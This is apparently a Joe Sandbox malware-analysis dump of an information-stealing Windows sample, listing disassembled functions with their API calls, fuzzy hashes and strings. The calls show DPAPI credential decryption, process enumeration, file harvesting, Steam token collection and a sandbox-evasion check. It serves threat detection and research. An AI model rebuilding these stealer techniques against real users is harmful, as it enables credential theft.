Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: Heap$Process$Alloc$CloseOpen$wsprintf$Namelstrcpy$InformationLocallstrlen$CurrentInfoKeyboardLayoutListLocaleProcess32QueryStatusSystemTimeUserValue__aulldivlstrcat$ChangeComputerCreateDefaultDirectoryEnumErrorFileFindFirstFreeGlobalHandleInternetLastLogicalMemoryModuleNextNotificationPowerProcessorSnapshotToolhelp32VolumeWindowsWow64Zone
String ID: E.A
API String ID: 1035121393-2211245587
Opcode ID: b8138d2cb021ad855c2c91f6e9635b1f270f0d4578551072dfb7634207718208
Instruction ID: c29c4d19e1a1d8256a8b8cfc17993bd3f91cdea4a247a897ffed86f061f16859
Opcode Fuzzy Hash: b8138d2cb021ad855c2c91f6e9635b1f270f0d4578551072dfb7634207718208
Instruction Fuzzy Hash: 9372B076D10118AACB15FB91EC91EDEB73DAF14308F51439FB01662491EF346B89CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00411350 Relevance: 6.1, APIs: 4, Instructions: 100stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00411378

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

strtok_s.MSVCRT ref: 0041146F

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,0436D980,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: lstrcpystrtok_s$lstrlen
String ID:
API String ID: 3184129880-0
Opcode ID: b32dbd48fef6c991f24393565f536ea1b201fd5407d7c8f9d1c6b670b0949385
Instruction ID: bc44fb65e395c18893d79e2daadfc8d7f4384440e0cba23ba4018ddaa6f79c9f
Opcode Fuzzy Hash: b32dbd48fef6c991f24393565f536ea1b201fd5407d7c8f9d1c6b670b0949385
Instruction Fuzzy Hash: 04417175D00208DBCB04EFE5D855AEEBB75BF48304F00811EE51177290EB38AA85CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 004096C0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
Part of subcall function 004093A0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A

Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552

StrStrA.SHLWAPI(00000000,04376738), ref: 0040971B

Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 004094CF
Part of subcall function 004094A0: LocalAlloc.KERNEL32(00000040,?,?,?,00404BAE,00000000,?), ref: 004094E1
Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 0040950A
Part of subcall function 004094A0: LocalFree.KERNEL32(?,?,?,?,00404BAE,00000000,?), ref: 0040951F

memcmp.MSVCRT ref: 00409774

Part of subcall function 00409540: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409564
Part of subcall function 00409540: LocalAlloc.KERNEL32(00000040,00000000), ref: 00409583
Part of subcall function 00409540: LocalFree.KERNEL32(?), ref: 004095AF

Strings

, xrefs: 004097A3
DPAPI, xrefs: 0040976B

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFileFree$BinaryString$ChangeCloseCreateDataFindNotificationReadSizeUnprotectlstrcpymemcmp
String ID: $DPAPI
API String ID: 2647593125-1819349886
Opcode ID: 0f5c4bf38f16a5dc7c6c7dc1d4b3af3428d24ec323dc2f9b096cad114df4e3c7
Instruction ID: 25d6f3248392bfa9bca68fd769027b68fff5740b7e0b7820d89104a1b18a6e16
Opcode Fuzzy Hash: 0f5c4bf38f16a5dc7c6c7dc1d4b3af3428d24ec323dc2f9b096cad114df4e3c7
Instruction Fuzzy Hash: 493141B6D10108EBCF04DF94DC45AEFB7B9AF48704F14452DE905B3292E7389A44CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00414DE0 Relevance: 6.1, APIs: 4, Instructions: 60processCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00414E07
Process32First.KERNEL32(00000000,00000128), ref: 00414E1B
Process32Next.KERNEL32(00000000,00000128), ref: 00414E30

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

FindCloseChangeNotification.KERNEL32(00000000), ref: 00414E9E

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: lstrcpy$Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 3491751439-0
Opcode ID: 2b9c76edc9b258419c7f4614c7dcd789399bcf7f85242a03647ad0e6e1076ea1
Instruction ID: b51d58226d22fc07b4aaea4bdcaba1b12d12dab42e387443cd86e66b2ce9f1c4
Opcode Fuzzy Hash: 2b9c76edc9b258419c7f4614c7dcd789399bcf7f85242a03647ad0e6e1076ea1
Instruction Fuzzy Hash: ED211D759002189BCB24EB61DC95FDEB779AF54304F1041DAA50A66190DF38AFC5CF94

Uniqueness

Uniqueness Score: -1.00%

Function 004159E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00411879,80000000,00000003,00000000,00000003,00000080,00000000,?,00411879,?), ref: 004159FC
GetFileSizeEx.KERNEL32(000000FF,00411879), ref: 00415A19
CloseHandle.KERNEL32(000000FF), ref: 00415A27

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSize
String ID:
API String ID: 1378416451-0
Opcode ID: f3a5877fc348a9a64368c001e27037213673241a1fda354ede690d4ee948c5a4
Instruction ID: adbcd47bb22ca6d6b42933acd4cabc8e10c5a14c322029dfd4b487fe3fd33794
Opcode Fuzzy Hash: f3a5877fc348a9a64368c001e27037213673241a1fda354ede690d4ee948c5a4
Instruction Fuzzy Hash: C9F03139F44604FBDB20DBF0DC85BDE7779BF44710F118255B951A7280DA7496428B44

Uniqueness

Uniqueness Score: -1.00%

Function 004137B3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0436D980,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 0041378A
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004137A8
CloseHandle.KERNEL32(00000000), ref: 004137B9
Sleep.KERNEL32(00001770), ref: 004137C4
CloseHandle.KERNEL32(?,00000000,?,0436D980,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 004137DA
ExitProcess.KERNEL32 ref: 004137E2

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$CreateExitOpenProcessSleep
String ID:
API String ID: 941982115-0
Opcode ID: b72d18ed1bdfc85c434ab68d1be83dc3fedaf905ff30e20f0e2c3bf58e55dee1
Instruction ID: 00ad45554361a1bf9ffb836df5d455c5d00fe00f471bf70531fad30136aebd8c
Opcode Fuzzy Hash: b72d18ed1bdfc85c434ab68d1be83dc3fedaf905ff30e20f0e2c3bf58e55dee1
Instruction Fuzzy Hash: 5FF054B0944206AAE720AFA1DD05BFE7675BB08B46F10851AF612951C0DBB856818A5D

Uniqueness

Uniqueness Score: -1.00%

Function 00406730 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 157COMMON

Download Yara Rule

Strings

Pi@, xrefs: 004067C2, 00406884, 0040679E, 0040684E, 0040689F

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID:
String ID: Pi@
API String ID: 0-1360946908
Opcode ID: 8cfa37973c56b3597612bf0eabde1d0c10c792fef38bbd1cab651f123bbbde38
Instruction ID: 3e1b1374d11ee30af11b8018be346ecc1401931fa3badc01db0dac5c56ce0c6a
Opcode Fuzzy Hash: 8cfa37973c56b3597612bf0eabde1d0c10c792fef38bbd1cab651f123bbbde38
Instruction Fuzzy Hash: 756105B5D00208DBDB14DF94D984BEEB7B0AB48304F1185AAE80677380D739AEA5DF95

Uniqueness

Uniqueness Score: -1.00%

Function 00404470 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60stringnetworkCOMMON

Download Yara Rule

APIs

Part of subcall function 00414FF0: malloc.MSVCRT ref: 00414FF8

lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506

Strings

<, xrefs: 00404489

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: CrackInternetlstrlenmalloc
String ID: <
API String ID: 3848002758-4251816714
Opcode ID: 687962ccc4eae67d17fcff549de06531ab168f4bf6ac0391c2f29faedae00af7
Instruction ID: 4ed07355fbd84ea2b0e25782c0c6f45789bb77a73037a8222357df496ca5bcbd
Opcode Fuzzy Hash: 687962ccc4eae67d17fcff549de06531ab168f4bf6ac0391c2f29faedae00af7
Instruction Fuzzy Hash: 52216DB1D00208ABDF10EFA5E845BDD7B74AB44324F008229FA25B72C0EB346A46CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0040EF80 Relevance: 4.7, APIs: 3, Instructions: 197COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,04370910), ref: 0040EFCE
StrCmpCA.SHLWAPI(00000000,04370900), ref: 0040F06F
StrCmpCA.SHLWAPI(00000000,04370920), ref: 0040F17E

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: f63b8197388c09f0171e1c296f62c96a59776cbd33401b2079ac3cf9a783bfc4
Instruction ID: 4355cab003f180362ea4467312be264c8b2230b95154913c46dc9b5fce20c885
Opcode Fuzzy Hash: f63b8197388c09f0171e1c296f62c96a59776cbd33401b2079ac3cf9a783bfc4
Instruction Fuzzy Hash: 8D719871B002099BCF08FF75D9929EEB77AAF94304B10852EF4099B285EA34DE45CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 0040EF9F Relevance: 4.7, APIs: 3, Instructions: 177COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,04370910), ref: 0040EFCE
StrCmpCA.SHLWAPI(00000000,04370900), ref: 0040F06F
StrCmpCA.SHLWAPI(00000000,04370920), ref: 0040F17E

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: db141857ae5d5c02fff8448f4ee19de15e2a37c00ac90ce392829f9e5a1f652a
Instruction ID: f0c51ec5e8e6f52f2f367cc82315d09f99f950b48122d5325302ee48485a66a2
Opcode Fuzzy Hash: db141857ae5d5c02fff8448f4ee19de15e2a37c00ac90ce392829f9e5a1f652a
Instruction Fuzzy Hash: 03618A71B002099FCF08EF75D9929EEB77AAF94304B10852EF4099B295DA34EE45CBC4

Uniqueness

Uniqueness Score: -1.00%

Function 004127E0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 118stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

lstrcat.KERNEL32(?,00000000), ref: 0041281A
lstrcat.KERNEL32(?,043774B0), ref: 00412838

Part of subcall function 00412570: wsprintfA.USER32 ref: 00412589
Part of subcall function 00412570: FindFirstFileA.KERNEL32(?,?), ref: 004125A0

Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D864), ref: 004125CE
Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D868), ref: 004125E4
Part of subcall function 00412570: FindNextFileA.KERNEL32(000000FF,?), ref: 004127B9
Part of subcall function 00412570: FindClose.KERNEL32(000000FF), ref: 004127CE

Part of subcall function 00412570: wsprintfA.USER32 ref: 0041260A
Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D4B2), ref: 0041261C
Part of subcall function 00412570: wsprintfA.USER32 ref: 00412639
Part of subcall function 00412570: PathMatchSpecA.SHLWAPI(?,?), ref: 0041266F
Part of subcall function 00412570: lstrcat.KERNEL32(?,04370A10), ref: 0041269B
Part of subcall function 00412570: lstrcat.KERNEL32(?,0041D880), ref: 004126AD
Part of subcall function 00412570: lstrcat.KERNEL32(?,?), ref: 004126BE
Part of subcall function 00412570: lstrcat.KERNEL32(?,0041D884), ref: 004126D0
Part of subcall function 00412570: lstrcat.KERNEL32(?,?), ref: 004126E4
Part of subcall function 00412570: CopyFileA.KERNEL32(?,?,00000001), ref: 004126FA
Part of subcall function 00412570: DeleteFileA.KERNEL32(?), ref: 00412779

Part of subcall function 00412570: wsprintfA.USER32 ref: 0041265B

Strings

00A, xrefs: 0041285C, 0041288B, 004128BB, 004128EA, 0041291A, 00412949, 0041296B, 0041285F, 0041288E, 004128BE, 004128ED, 0041291D, 0041294C

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: 00A
API String ID: 2104210347-95910775
Opcode ID: aee14ac10de1ece76b3008eda533a8383be3bc2d628396bcb6b319180cdda7cd
Instruction ID: 9a839e9be304faf39bc4facc08b08f26c4420ed68fa3aa933a56f5c5bfc0aac5
Opcode Fuzzy Hash: aee14ac10de1ece76b3008eda533a8383be3bc2d628396bcb6b319180cdda7cd
Instruction Fuzzy Hash: 6441ABB7A001047BCB24FBE0DC92EEA377E9B94705F00424DB55987191ED74A7D48BD9

Uniqueness

Uniqueness Score: -1.00%

Function 00415B70 Relevance: 4.5, APIs: 3, Instructions: 29COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?), ref: 00415B84
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00415BA5
CloseHandle.KERNEL32(00000000), ref: 00415BAF

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID:
API String ID: 3183270410-0
Opcode ID: 97fc9d568dab5260ce1fa1a51ba1ebaf2853d767a04b83f08cd6b5726440208b
Instruction ID: b12b055c0fde6327b7bfc42128d307bcca402a5100f46dd347d8d84938e244fe
Opcode Fuzzy Hash: 97fc9d568dab5260ce1fa1a51ba1ebaf2853d767a04b83f08cd6b5726440208b
Instruction Fuzzy Hash: C5F05475A0010CFBDB14DFA4DC4AFED7778BB08300F004499BA0597280D6B06E85CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00414400 Relevance: 4.5, APIs: 3, Instructions: 23memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
HeapAlloc.KERNEL32(00000000), ref: 00414414
GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: Heap$AllocComputerNameProcess
String ID:
API String ID: 4203777966-0
Opcode ID: 6e220fa814439a9a47cb0e7b1b891ce31241d7c627682025937d03601ca1af04
Instruction ID: 2ac30a00ccf60c4f43266989ac8565747831d88261cb92d9c694311de33eed43
Opcode Fuzzy Hash: 6e220fa814439a9a47cb0e7b1b891ce31241d7c627682025937d03601ca1af04
Instruction Fuzzy Hash: F1E0D8B0A00608FBCB20DFE4DD48BDD77BCAB04305F100055FA05D3240D7749A458B96

Uniqueness

Uniqueness Score: -1.00%

Function 004010D0 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,004136DC), ref: 004010EB
VirtualAllocExNuma.KERNEL32(00000000,?,?,004136DC), ref: 004010F2
ExitProcess.KERNEL32 ref: 00401103

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: Process$AllocCurrentExitNumaVirtual
String ID:
API String ID: 1103761159-0
Opcode ID: b1c8d233814077f36e701fc9dcba40fcf29c53b912e4e1fc8df77dce1fb5e496
Instruction ID: b86936f0f7b92ad6105a5e8d9325c57b614f4cde8fc05540e07f2d0ff83aec39
Opcode Fuzzy Hash: b1c8d233814077f36e701fc9dcba40fcf29c53b912e4e1fc8df77dce1fb5e496
Instruction Fuzzy Hash: 1BE0867098570CBBE7309BA0DD0AB1976689B08B06F101055F7097A1D0C6B425008699

Uniqueness

Uniqueness Score: -1.00%

Function 004119B0 Relevance: 3.1, APIs: 2, Instructions: 66stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 004119C8

Part of subcall function 00411650: wsprintfA.USER32 ref: 00411669
Part of subcall function 00411650: FindFirstFileA.KERNEL32(?,?), ref: 00411680

strtok_s.MSVCRT ref: 00411A4D

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: strtok_s$FileFindFirstwsprintf
String ID:
API String ID: 3409980764-0
Opcode ID: 975833a798ef07385fb740c26f6e35f7306421425023d288693ea324a83a39c3
Instruction ID: 5fc3070f54b5ba386e916c7c3ae22cc6ad81f817c7a7f871d2ab45b9afc63085
Opcode Fuzzy Hash: 975833a798ef07385fb740c26f6e35f7306421425023d288693ea324a83a39c3
Instruction Fuzzy Hash: 19215471900108EBCB14FFA5CC55FED7B79AF44345F10805AF51A97151EB386B84CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00412B30 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 40stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,0436D980,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

lstrlen.KERNEL32(00000000,00000000,0041D599,?,?,?,?,?,?,00412FF8,?), ref: 00412B5A

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,04370BC0), ref: 00404ED9

Strings

steam_tokens.txt, xrefs: 00412B6F

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

